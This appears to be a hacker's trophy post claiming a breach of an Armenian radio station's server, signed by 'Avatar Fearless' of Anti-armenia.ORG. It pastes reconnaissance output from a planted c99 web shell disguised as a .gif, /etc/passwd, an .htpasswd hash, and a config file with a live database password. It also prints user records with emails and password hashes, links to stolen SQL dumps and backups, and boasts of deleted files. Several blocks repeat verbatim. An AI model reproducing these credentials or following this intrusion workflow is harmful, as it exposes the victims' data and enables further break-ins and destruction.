flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 xsave lahf_lm tpr_shadow vnmi flexpriority
bogomips : 4999.30
clflush size : 64
power management:
RAM - total used free shared buffers cached
Mem: 4049 1675 2374 0 561 595
-/+ buffers/cache: 518 3531
Swap: 8189 73 8115
HDD space - Filesystem Size Used Avail Use% Mounted on
/dev/sda1 29G 4.9G 23G 18% /
/dev/sda4 27G 11G 15G 43% /home
/dev/sdb1 2.7T 1.2T 1.5T 45% /var
/dev/sda3 1012M 67M 894M 7% /tmp
tmpfs 2.0G 0 2.0G 0% /dev/shm
List of Attributes - --------------- ./..
--------------- ./3-c99.php.gif
--------------- ./.
Mount options -
#
# /etc/fstab
# Created by anaconda on Tue Apr 28 19:31:32 2009
#
# Accessible filesystems, by reference, are maintained under '/dev/disk'
# See man pages fstab(5), findfs(8), mount(8) and/or vol_id(8) for more info
#
UUID=20377916-7ed5-4142-947c-4b824ffa7a0b / ext3 defaults 1 1
UUID=c96e5a9d-1477-4ed3-bc94-b54165fbf61a /home ext3 defaults 1 2
UUID=32aad996-c5b7-47ac-a5ff-bc424afe7c55 /var ext3 defaults 1 2
UUID=70d2a556-f240-49af-91ea-1682ada775cb /tmp ext3 defaults 1 2
tmpfs /dev/shm tmpfs defaults 0 0
devpts /dev/pts devpts gid=5,mode=620 0 0
sysfs /sys sysfs defaults 0 0
proc /proc proc defaults 0 0
UUID=d7f696c1-dfcf-4b16-9cc8-fe522b67e325 swap swap defaults 0 0
Is cURL installed? - /usr/bin/curl
Is links installed? - /usr/bin/links
Is GET installed? - /usr/bin/GET
Is perl installed? - /usr/bin/perl
Where is apache - apache:
Where is perl? - perl: /usr/bin/perl /usr/share/man/man1/perl.1.gz
locate httpd.conf - /etc/httpd/conf/httpd.conf
/usr/share/system-config-httpd/httpd.conf.xsl
cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 media.radiovan.am media localhost
::1 localhost6.localdomain6 localhost6
/* Avatar Fearless
Anti-armenia.ORG */
+---------------------------------------------------------------------------------------+
|Software: Apache/2.2.14 (Fedora). PHP/5.2.9 |
| |
|uname -a: Linux media.radiovan.am 2.6.30.5 #1 SMP Fri Aug 21 04:59:24 AMST 2009 i686 |
| |
|uid=48(apache) gid=48(apache) groups=48(apache),489(backuppc) |
|context=unconfined_u:system_r:httpd_t:s0 |
| |
|Safe-mode: OFF (not secure) |
+---------------------------------------------------------------------------------------+
http://nashoffice.radiovan.am/ , http://arab-zone.net/mirror/159861/nashoffice.radiovan.am/
.htpasswd :
top:aaVXR1JupgoFo
More Info :
OS Version? - Linux version 2.6.30.5 (root@media.radiovan.am) (gcc version 4.3.2 20081105 (Red Hat 4.3.2-7) (GCC) ) #1 SMP Fri Aug 21 04:59:24 AMST 2009
Kernel version? - kernel.version = #1 SMP Fri Aug 21 04:59:24 AMST 2009
net.ipv4.conf.all.force_igmp_version = 0
net.ipv4.conf.default.force_igmp_version = 0
net.ipv4.conf.lo.force_igmp_version = 0
net.ipv4.conf.eth0.force_igmp_version = 0
net.ipv4.conf.eth1.force_igmp_version = 0
net.ipv4.conf.pan0.force_igmp_version = 0
net.ipv6.conf.all.force_mld_version = 0
net.ipv6.conf.default.force_mld_version = 0
net.ipv6.conf.lo.force_mld_version = 0
net.ipv6.conf.eth0.force_mld_version = 0
net.ipv6.conf.eth1.force_mld_version = 0
net.ipv6.conf.pan0.force_mld_version = 0
Distrib name - Fedora release 10 (Cambridge)
Kernel \r on an \m (\l)
CPU? - processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Xeon(R) CPU E5420 @ 2.50GHz
stepping : 10
cpu MHz : 2000.000
cache size : 6144 KB
physical id : 0
siblings : 4
core id : 0
cpu cores : 4
apicid : 0
initial apicid : 0
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 xsave lahf_lm tpr_shadow vnmi flexpriority
bogomips : 4999.44
clflush size : 64
power management:
processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Xeon(R) CPU E5420 @ 2.50GHz
stepping : 10
cpu MHz : 2500.000
cache size : 6144 KB
physical id : 1
siblings : 4
core id : 0
cpu cores : 4
apicid : 4
initial apicid : 4
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 xsave lahf_lm tpr_shadow vnmi flexpriority
bogomips : 4999.29
clflush size : 64
power management:
processor : 2
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Xeon(R) CPU E5420 @ 2.50GHz
stepping : 10
cpu MHz : 2000.000
cache size : 6144 KB
physical id : 0
siblings : 4
core id : 1
cpu cores : 4
apicid : 1
initial apicid : 1
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 xsave lahf_lm tpr_shadow vnmi flexpriority
bogomips : 4999.28
clflush size : 64
power management:
processor : 3
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Xeon(R) CPU E5420 @ 2.50GHz
stepping : 10
cpu MHz : 2500.000
cache size : 6144 KB
physical id : 1
siblings : 4
core id : 1
cpu cores : 4
apicid : 5
initial apicid : 5
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 xsave lahf_lm tpr_shadow vnmi flexpriority
bogomips : 5054.94
clflush size : 64
power management:
processor : 4
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Xeon(R) CPU E5420 @ 2.50GHz
stepping : 10
cpu MHz : 2000.000
cache size : 6144 KB
physical id : 0
siblings : 4
core id : 2
cpu cores : 4
apicid : 2
initial apicid : 2
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 xsave lahf_lm tpr_shadow vnmi flexpriority
bogomips : 4999.26
clflush size : 64
power management:
processor : 5
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Xeon(R) CPU E5420 @ 2.50GHz
stepping : 10
cpu MHz : 2000.000
cache size : 6144 KB
physical id : 1
siblings : 4
core id : 2
cpu cores : 4
apicid : 6
initial apicid : 6
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 xsave lahf_lm tpr_shadow vnmi flexpriority
bogomips : 4999.28
clflush size : 64
power management:
processor : 6
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Xeon(R) CPU E5420 @ 2.50GHz
stepping : 10
cpu MHz : 2000.000
cache size : 6144 KB
physical id : 0
siblings : 4
core id : 3
cpu cores : 4
apicid : 3
initial apicid : 3
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 xsave lahf_lm tpr_shadow vnmi flexpriority
bogomips : 4999.26
clflush size : 64
power management:
processor : 7
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Xeon(R) CPU E5420 @ 2.50GHz
stepping : 10
cpu MHz : 2000.000
cache size : 6144 KB
physical id : 1
siblings : 4
core id : 3
cpu cores : 4
apicid : 7
initial apicid : 7
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 xsave lahf_lm tpr_shadow vnmi flexpriority
bogomips : 4999.30
clflush size : 64
power management:
RAM - total used free shared buffers cached
Mem: 4049 1675 2374 0 561 595
-/+ buffers/cache: 518 3531
Swap: 8189 73 8115
HDD space - Filesystem Size Used Avail Use% Mounted on
/dev/sda1 29G 4.9G 23G 18% /
/dev/sda4 27G 11G 15G 43% /home
/dev/sdb1 2.7T 1.2T 1.5T 45% /var
/dev/sda3 1012M 67M 894M 7% /tmp
tmpfs 2.0G 0 2.0G 0% /dev/shm
List of Attributes - --------------- ./..
--------------- ./3-c99.php.gif
--------------- ./.
Mount options -
#
# /etc/fstab
# Created by anaconda on Tue Apr 28 19:31:32 2009
#
# Accessible filesystems, by reference, are maintained under '/dev/disk'
# See man pages fstab(5), findfs(8), mount(8) and/or vol_id(8) for more info
#
UUID=20377916-7ed5-4142-947c-4b824ffa7a0b / ext3 defaults 1 1
UUID=c96e5a9d-1477-4ed3-bc94-b54165fbf61a /home ext3 defaults 1 2
UUID=32aad996-c5b7-47ac-a5ff-bc424afe7c55 /var ext3 defaults 1 2
UUID=70d2a556-f240-49af-91ea-1682ada775cb /tmp ext3 defaults 1 2
tmpfs /dev/shm tmpfs defaults 0 0
devpts /dev/pts devpts gid=5,mode=620 0 0
sysfs /sys sysfs defaults 0 0
proc /proc proc defaults 0 0
UUID=d7f696c1-dfcf-4b16-9cc8-fe522b67e325 swap swap defaults 0 0
Is cURL installed? - /usr/bin/curl
Is links installed? - /usr/bin/links
Is GET installed? - /usr/bin/GET
Is perl installed? - /usr/bin/perl
Where is apache - apache:
Where is perl? - perl: /usr/bin/perl /usr/share/man/man1/perl.1.gz
locate httpd.conf - /etc/httpd/conf/httpd.conf
/usr/share/system-config-httpd/httpd.conf.xsl
cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 media.radiovan.am media localhost
::1 localhost6.localdomain6 localhost6
/* Avatar Fearless
Anti-armenia.ORG */
(P.S : http://pastebin.com/d1B3QYau)
Və Son Olaraqda config + SQL + cat /etc/passwd
Kod:
+-------------------------+
| cat /etc/passwd |
+-------------------------+
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
avahi-autoipd:x:499:499:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
pulse:x:498:498:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:495:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
avahi:x:497:494:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
smolt:x:496:493:Smolt:/usr/share/smolt:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
torrent:x:495:492:BitTorrent Seed/Tracker:/var/lib/bittorrent:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
openvpn:x:494:491:OpenVPN:/etc/openvpn:/sbin/nologin
dovecot:x:493:490:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
backuppc:x:492:489::/var/lib/BackupPC:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
victoria:x:500:500::/home/victoria:/bin/bash
ed:x:501:501::/home/ed:/bin/bash
sitemax:x:502:502::/var/www/vhosts/radiovan.am/www/:/sbin/nologin
blogs:x:503:503::/var/www/vhosts/radiovan.am/blogs:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
ices:x:491:487:IceS Shoutcast source:/tmp:/sbin/nologin
icecast:x:490:486:icecast streaming server:/usr/share/icecast:/sbin/nologin
ices0:x:489:485:IceS Shoutcast source:/:/sbin/nologin
robert:x:505:505::/var/www/vhosts/radiovan.am/podcast/:/sbin/nologin
sphinx:x:506:506::/home/sphinx:/sbin/nologin
public:x:507:507::/var/storage/homedirs/public:/sbin/nologin
rusradio:x:508:508::/var/www/vhosts/rusradio.am:/sbin/nologin
radio:x:509:509::/var/storage/homedirs/radio:/sbin/nologin
recieved:x:510:510::/home/recieved:/sbin/nologin
webmaster:x:504:504::/home/webmaster:/bin/bash
hakob:x:512:512::/home/hakob:/bin/bash
vahan:x:513:513::/home/vahan:/bin/bash
Config.php
<?PHP
/* ====================
[BEGIN_SED]
File=datas/config.php
Version=120
Updated=2007-feb-21
Type=Config
Author=Gaz
Description=Configuration
[END_SED]
==================== */
// ========================
// MySQL database parameters. Change to fit your host.
// ========================
set_magic_quotes_runtime(0);
ini_set('magic_quotes_gpc','Off');
error_reporting(E_ALL);
$cfg['flashcache'] = '_01';
$cfg['mysqlhost'] = 'localhost'; // Database host URL
$cfg['mysqluser'] = 'radiovan'; // Database user
$cfg['mysqlpassword'] = 'Vdf84Mffd2'; // Database password
$cfg['mysqldb'] = 'radiovan';
// ========================
// Default skin and default language
// ========================
$cfg['mainpage'] = 'about'; // Default page alias
$cfg['defaultskin'] = 'main'; // Default skin code. Be SURE it's pointing to a valid folder in /skins/... !!
$cfg['defaultlang'] = 'ru'; // Default language code
$cfg['defaultpage'] = 'home';
$langpriority = array('en'=>0,'am'=>1,'ru'=>2);
define('started',2003);
define('ipp',10); // items per page for admin
// ========================
// More settings
// Should work fine in most of cases.
// If you don't know, don't change.
// TRUE = enabled / FALSE = disabled
// ========================
$cfg['sqldb'] = 'mysql'; // Type of the database engine.
$cfg['authmode'] = 3; // (1:cookies, 2:sessions, 3:cookies+sessions) default=3
$cfg['redirmode'] = FALSE; // 0 or 1, Set to '1' if you cannot sucessfully log in (IIS servers)
$cfg['xmlclient'] = FALSE; // For testing-purposes only, else keep it off.
$cfg['ipcheck'] = TRUE; // Will kill the logged-in session if the IP has changed
$cfg['allowphp_override'] = TRUE; // General lock for execution of the PHP code by the core
// ========================
// Name of MySQL tables
// (OPTIONAL, if missing, engine will set default values)
// Only change the "sed" part if you'd like to
// make 2 separated install in the same database.
// or you'd like to share some tables between 2 sites.
// Else do not change.
// ========================
$db_auth = 'sed_auth';
$db_banlist = 'sed_banlist';
$db_cache = 'sed_cache';
$db_com = 'sed_com';
$db_core = 'sed_core';
$db_dealers = 'sed_dealers';
$db_articles = 'sed_articles';
$db_vacancies = 'sed_vacancies';
$db_config = 'sed_config';
$db_forum_posts = 'sed_forum_posts';
$db_forum_sections = 'sed_forum_sections';
$db_forum_structure = 'sed_forum_structure';
$db_forum_topics = 'sed_forum_topics';
$db_groups = 'sed_groups';
$db_groups_users = 'sed_groups_users';
$db_logger = 'sed_logger';
$db_online = 'sed_online';
$db_pages = 'sed_pages';
$db_pfs = 'sed_pfs';
$db_pfs_folders = 'sed_pfs_folders';
$db_plugins = 'sed_plugins';
$db_pm = 'sed_pm';
$db_polls = 'sed_polls';
$db_polls_options = 'sed_polls_options';
$db_polls_voters = 'sed_polls_voters';
$db_rated = 'sed_rated';
$db_ratings = 'sed_ratings';
$db_referers = 'sed_referers';
$db_smilies = 'sed_smilies';
$db_shop_category = 'sed_shop_category';
$db_shop_product = 'sed_shop_product';
$db_stats = 'sed_stats';
$db_structure = 'sed_structure';
$db_trash = 'sed_trash';
$db_users = 'sed_users';
$db_ems_zones = 'sed_ems_zones';
$db_ems_tarifs = 'sed_ems_tarifs';
$db_pi_region = 'sed_pi_regions';
$db_pi_cities = 'sed_pi_cities';
$db_pi_pos = 'sed_pi_pos';
$db_pi_streets = 'sed_pi_streets';
$db_news = 'sed_news';
$db_links = 'sed_links';
$db_artists = 'sed_artists';
$db_videos = 'sed_videos';
$db_audios = 'sed_audios';
$db_gallery = 'sed_gallery';
$db_categories = 'sed_categories';
$db_products = 'sed_products';
$db_galleries = 'sed_zgalleries';
$db_galimages = 'sed_zgalleriesentries';
$db_videos = 'sed_videos';
$db_videositems = 'sed_videositems';
$db_zpages = 'sed_zpages';
$db_znews = 'sed_znews';
$db_zalnews = 'sed_zalnews';
$db_ztravelogues = 'sed_ztravelogues';
$db_zevents = 'sed_zevents';
$db_zbb = 'sed_zbb';
$db_zlinks = 'sed_zlinks';
$db_zhelptips = 'sed_zhelptips';
$db_znews = 'sed_znews';
$db_znewsentries = 'sed_znewsentries';
$db_zvotesentries = 'sed_zvotesentries';
$db_zvotes = 'sed_zvotes';
$db_zvacanciesentries = 'sed_zvacanciesentries';
$db_zvacancies = 'sed_zvacancies';
$db_znewsentries = 'sed_znewsentries';
$db_znews = 'sed_znews';
$db_guestgalimages = 'sed_zguestgalleriesentries';
$db_zawards = 'sed_zawards';
$adminmenuarray = array(
'en' => array(
'Settings'=>'admin.php?m=config&n=edit&o=core&p=main',
'News'=>'admin.php?m=tools&p=z_newsedit&a=clp&pid=1',
'Radio news'=>'admin.php?m=tools&p=z_newsedit&a=clp&pid=2',
'New music'=>'admin.php?m=tools&p=mediaedit&a=clp&pid=1',
'Free music'=>'admin.php?m=tools&p=mediaedit&a=clp&pid=2',
'Kitchen'=>'admin.php?m=tools&p=mediaedit&a=clp&pid=3',
'Top10'=>'admin.php?m=tools&p=z_top10edit&a=clp&pid=1',
'VJ voting'=>'admin.php?m=tools&p=z_top10edit&a=clp&pid=2',
//'Guests'=>'admin.php?m=tools&p=z_guestgalleriesedit',
'Staff'=>'admin.php?m=tools&p=z_staffsedit',
'Projects'=>'admin.php?m=tools&p=projectsedit',
'Awards'=>'admin.php?m=tools&p=z_awardsedit',
'Image galleries'=>'admin.php?m=tools&p=z_galleriesedit',
'Questioning'=>'admin.php?m=tools&p=voteedit',
'Runing string'=>'admin.php?m=tools&p=marqueeedit&a=clp&pid=1',
'Banners'=>'admin.php?m=tools&p=z_bannersedit',
'Contacts'=>'admin.php?m=config&n=edit&o=plug&p=z_feedback',
'File manager'=>'pfs.php',
'Constants'=>'admin.php?m=tools&p=z_constantsedit',
'Sitemap Editor'=>'admin.php?m=tools&p=z_sitemapedit',
'Plugins'=>'admin.php?m=plug',
),
'ru' => array(
'Настройки'=>'admin.php?m=config&n=edit&o=core&p=main',
'Новости'=>'admin.php?m=tools&p=z_newsedit&a=clp&pid=1',
'Новости радио'=>'admin.php?m=tools&p=z_newsedit&a=clp&pid=2',
'Новая музыка'=>'admin.php?m=tools&p=mediaedit&a=clp&pid=1',
'Халява'=>'admin.php?m=tools&p=mediaedit&a=clp&pid=2',
'Кухня'=>'admin.php?m=tools&p=mediaedit&a=clp&pid=3',
'Топ 10'=>'admin.php?m=tools&p=z_top10edit&a=clp&pid=1',
'VJ голосования'=>'admin.php?m=tools&p=z_top10edit&a=clp&pid=2',
//'Гости'=>'admin.php?m=tools&p=z_guestgalleriesedit&a=clp&pid=1',
'Сотрудники'=>'admin.php?m=tools&p=z_staffsedit',
'Проекты'=>'admin.php?m=tools&p=projectsedit',
'Награды'=>'admin.php?m=tools&p=z_awardsedit',
'Галереи'=>'admin.php?m=tools&p=z_galleriesedit',
'Опрос'=>'admin.php?m=tools&p=voteedit',
'Бегушая строка'=>'admin.php?m=tools&p=marqueeedit&a=clp&pid=1',
'Баннеры'=>'admin.php?m=tools&p=z_bannersedit',
'Контакты'=>'admin.php?m=config&n=edit&o=plug&p=z_feedback',
'Константы'=>'admin.php?m=tools&p=z_constantsedit',
'Загрузки'=>'pfs.php',
'Страницы'=>'admin.php?m=tools&p=z_sitemapedit',
'Дополнения'=>'admin.php?m=plug',
)
);
$langnames = array(
'en'=>'English',
'ru'=>'Russian',
'am'=>'Armenian',
);
$month_array['en'] =array(
'01' => 'January',
'02' => 'February',
'03' => 'March',
'04' => 'April',
'05' => 'May',
'06' => 'June',
'07' => 'July',
'08' => 'August',
'09' => 'September',
'10' => 'October',
'11' => 'November',
'12' => 'December',
);
$month_array['ru'] =array(
'01' => 'Январь',
'02' => 'Февраль',
'03' => 'Март',
'04' => 'Апрель',
'05' => 'Май',
'06' => 'Июнь',
'07' => 'Июль',
'08' => 'Август',
'09' => 'Сентябрь',
'10' => 'Октябрь',
'11' => 'Ноябрь',
'12' => 'Декабрь',
);
?>
+ rmned!!!
Deleted Files!(not all)
Some Captcha From SQL + Information :
id login password access_level is_active fname lname email country city sex
1 admin 1a1dc91c907325c69271ddf0c944bc72 9 1 Admin Adminyan admin@gmail.com Armenia Yerevan 1
8 admin@a.sds b2ca678b4c936f905fb82f2733f5297f 1 1 Edgar asd admin@a.sds null null 1
5 admin@a.sd 099b3b060154898840f0ebdfb46ec78f 1 1 aaa sdsd admin@a.sd qwe qwe 1
9 root 47bce5c74f589f4867dbd57e9ca9f808 1 1 Edo fdssdf root asd dsa 1
28 q@w.qw 76d80224611fc919a5d54f0ff9fba446 1 1 fg h sgsdfgsg q@w.qw dsf qwe 1
Image :
http://s019.radikal.ru/i641/1207/73/f910dc351654.png
SQL Dumped :
(Test)
http://pastebin.com/x0Xd07Qi
SQL Dumped :
(Radiovan)[Download]
http://www.share.az/mspu1sp9ovw2/radiovansql.txt.html
Backup (Weekly + Daily)
[download] :
http://www.share.az/rdpsb532ibg3/Backup.rar.html
0day by. Avatar Fearless
_____ __
/ _ \___ _______ _/ |______ _______
/ /_\ \ \/ /\__ \\ __\__ \\_ __ \
/ | \ / / __ \| | / __ \| | \/
\____|__ /\_/ (____ /__| (____ /__|
\/ \/ \/
Special Thank`Z To : AkaStep & The Chaos M0M!K
R3SP3CT T0 : ALL MY Bro*S
___ __ _ _ ____ ___ _____
/ _ | ___ / /_(_)______ _______ _ ___ ___ (_)__ _ / __ \/ _ \/ ___/
/ __ |/ _ \/ __/ /___/ _ `/ __/ ' \/ -_) _ \/ / _ `// /_/ / , _/ (_ /
/_/ |_/_//_/\__/_/ \_,_/_/ /_/_/_/\__/_//_/_/\_,_(_)____/_/|_|\___/
More Information Cooming Soon! http://radiovan.am R3FUCK3D!!!
| cat /etc/passwd |
+-------------------------+
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
avahi-autoipd:x:499:499:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
pulse:x:498:498:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:495:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
avahi:x:497:494:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
smolt:x:496:493:Smolt:/usr/share/smolt:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
torrent:x:495:492:BitTorrent Seed/Tracker:/var/lib/bittorrent:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
openvpn:x:494:491:OpenVPN:/etc/openvpn:/sbin/nologin
dovecot:x:493:490:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
backuppc:x:492:489::/var/lib/BackupPC:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
victoria:x:500:500::/home/victoria:/bin/bash
ed:x:501:501::/home/ed:/bin/bash
sitemax:x:502:502::/var/www/vhosts/radiovan.am/www/:/sbin/nologin
blogs:x:503:503::/var/www/vhosts/radiovan.am/blogs:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
ices:x:491:487:IceS Shoutcast source:/tmp:/sbin/nologin
icecast:x:490:486:icecast streaming server:/usr/share/icecast:/sbin/nologin
ices0:x:489:485:IceS Shoutcast source:/:/sbin/nologin
robert:x:505:505::/var/www/vhosts/radiovan.am/podcast/:/sbin/nologin
sphinx:x:506:506::/home/sphinx:/sbin/nologin
public:x:507:507::/var/storage/homedirs/public:/sbin/nologin
rusradio:x:508:508::/var/www/vhosts/rusradio.am:/sbin/nologin
radio:x:509:509::/var/storage/homedirs/radio:/sbin/nologin
recieved:x:510:510::/home/recieved:/sbin/nologin
webmaster:x:504:504::/home/webmaster:/bin/bash
hakob:x:512:512::/home/hakob:/bin/bash
vahan:x:513:513::/home/vahan:/bin/bash
Config.php
<?PHP
/* ====================
[BEGIN_SED]
File=datas/config.php
Version=120
Updated=2007-feb-21
Type=Config
Author=Gaz
Description=Configuration
[END_SED]
==================== */
// ========================
// MySQL database parameters. Change to fit your host.
// ========================
set_magic_quotes_runtime(0);
ini_set('magic_quotes_gpc','Off');
error_reporting(E_ALL);
$cfg['flashcache'] = '_01';
$cfg['mysqlhost'] = 'localhost'; // Database host URL
$cfg['mysqluser'] = 'radiovan'; // Database user
$cfg['mysqlpassword'] = 'Vdf84Mffd2'; // Database password
$cfg['mysqldb'] = 'radiovan';
// ========================
// Default skin and default language
// ========================
$cfg['mainpage'] = 'about'; // Default page alias
$cfg['defaultskin'] = 'main'; // Default skin code. Be SURE it's pointing to a valid folder in /skins/... !!
$cfg['defaultlang'] = 'ru'; // Default language code
$cfg['defaultpage'] = 'home';
$langpriority = array('en'=>0,'am'=>1,'ru'=>2);
define('started',2003);
define('ipp',10); // items per page for admin
